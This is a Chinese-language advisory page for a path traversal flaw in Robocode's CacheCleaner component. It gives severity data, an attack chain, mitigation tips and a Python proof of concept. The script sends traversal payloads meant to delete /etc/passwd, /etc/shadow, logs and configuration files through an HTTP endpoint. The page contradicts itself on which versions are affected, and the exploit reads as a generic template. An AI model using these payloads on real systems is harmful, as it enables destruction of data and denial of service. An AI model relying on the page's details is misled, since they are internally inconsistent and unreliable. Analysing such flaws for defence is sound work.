CVE-2025-14306: Robocode CacheCleaner目录遍历导致任意文件删除

漏洞信息

漏洞编号

CVE-2025-14306

漏洞类型

目录遍历/路径遍历

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Robocode 1.9.3.6

漏洞概述

CVE-2025-14306是存在于Robocode应用程序CacheCleaner组件中的高危安全漏洞。该漏洞源于CacheCleaner类的recursivelyDelete方法在处理文件路径时缺乏有效的安全验证机制，允许攻击者通过构造包含路径遍历序列（如../）的特殊文件名来访问和删除应用程序运行目录之外的任意系统文件。此漏洞的CVSS评分高达9.1，属于严重级别，具有网络可利用性，无需认证和用户交互即可被触发。攻击者可以利用此漏洞删除系统关键文件，导致应用程序功能受损、拒绝服务甚至进一步利用（如删除安全日志以掩盖攻击痕迹）。该漏洞由新加坡政府技术团队（[email protected]）发现并披露，发现日期为2025年12月9日。

技术细节

Robocode 1.9.3.6版本中的CacheCleaner组件存在目录遍历漏洞。漏洞核心在于recursivelyDelete方法未对用户可控的文件路径参数进行充分的路径规范化（path canonicalization）和安全校验。攻击者可通过提交特制的文件路径输入，在路径中嵌入../等目录遍历序列，绕过预期的目录限制，实现对任意目录的访问和文件操作。该方法在递归删除缓存文件时，直接使用未经清理的路径进行文件系统操作，导致攻击者可以删除服务器上的任意文件。漏洞利用条件宽松：攻击向量为网络层面（AV:N），无需认证（PR:N）且无需用户交互（UI:N），这意味着任何能够向CacheCleaner组件提交文件路径参数的攻击者都可以触发此漏洞。攻击成功后可造成高完整性影响（I:H）和高可用性影响（A:H），机密性影响较低（C:L）。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统上运行的Robocode 1.9.3.6版本及其CacheCleaner组件端点

STEP 2

步骤2

攻击者分析CacheCleaner的recursivelyDelete方法的输入参数格式

STEP 3

步骤3

攻击者构造包含目录遍历序列（../）的恶意文件路径作为输入

STEP 4

步骤4

通过HTTP请求或其他接口向CacheCleaner组件提交特制的路径参数

STEP 5

步骤5

漏洞代码未对路径进行规范化处理，直接使用恶意路径执行文件删除操作

STEP 6

步骤6

攻击者成功删除目标系统上的任意文件，可能导致拒绝服务或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-14306 PoC - Directory Traversal in Robocode CacheCleaner
# Target: Robocode 1.9.3.6 CacheCleaner Component

TARGET_URL = "http://target:8080/cacheclean"

def exploit_directory_traversal():
    """
    Exploit the directory traversal vulnerability in CacheCleaner recursivelyDelete method.
    This PoC demonstrates how to delete arbitrary files outside the cache directory.
    """
    
    # Payload to delete /etc/passwd using path traversal
    # The ../ sequences will traverse up from the cache directory to system root
    malicious_path = "../../../../../../etc/passwd"
    
    # Alternative payloads for different targets
    payloads = [
        "../../../../../../etc/passwd",           # Delete system passwd file
        "../../../../../../var/log/app.log",      # Delete application logs
        "../../../config/database.yml",           # Delete configuration files
        "../../../../../../etc/shadow",           # Attempt to delete shadow file
    ]
    
    for payload in payloads:
        try:
            # Send malicious request to CacheCleaner endpoint
            response = requests.post(
                TARGET_URL,
                data={'path': payload},
                timeout=10
            )
            print(f"[*] Sent payload: {payload}")
            print(f"[*] Response status: {response.status_code}")
            
            if response.status_code == 200:
                print(f"[!] File deletion request sent successfully")
                print(f"[!] Target file may have been deleted")
            else:
                print(f"[*] Request failed or blocked")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-14306 - Robocode CacheCleaner Directory Traversal PoC")
    print("=" * 60)
    exploit_directory_traversal()

影响范围

Robocode < 1.9.3.6 (CacheCleaner组件所有版本)

防御指南

临时缓解措施

如果无法立即升级，可在Web应用层或API网关处增加输入验证规则，过滤包含../、..\等路径遍历序列的请求参数。同时限制Robocode进程的操作系统权限，确保其只能访问必要的缓存目录。对于已停止维护的旧版本，建议迁移至最新稳定版本或考虑替代方案。